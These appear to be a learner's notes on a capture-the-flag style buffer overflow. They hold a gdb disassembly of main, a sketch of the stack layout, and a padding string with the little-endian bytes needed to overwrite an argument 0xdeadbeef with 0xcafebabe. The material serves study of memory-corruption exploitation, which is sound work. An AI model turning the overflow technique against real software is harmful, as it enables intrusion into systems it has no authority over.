(gdb) disas main
Dump of assembler code for function main:
   0x0000068a <+0>:     push   %ebp
   0x0000068b <+1>:     mov    %esp,%ebp
   0x0000068d <+3>:     and    $0xfffffff0,%esp
   0x00000690 <+6>:     sub    $0x10,%esp ; 32 char buffer
   0x00000693 <+9>:     movl   $0xdeadbeef,(%esp) ; we need to make this 0xcafebabe
   0x0000069a <+16>:    call   0x62c <func>
   0x0000069f <+21>:    mov    $0x0,%eax
   0x000006a4 <+26>:    leave
   0x000006a5 <+27>:    ret
End of assembler dump.

#################################################
Stack should be like:

buffer, base pointer, return, paramater, function

aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmm0xcafebabe

Little-endian
\xbe\xba\xfe\xca
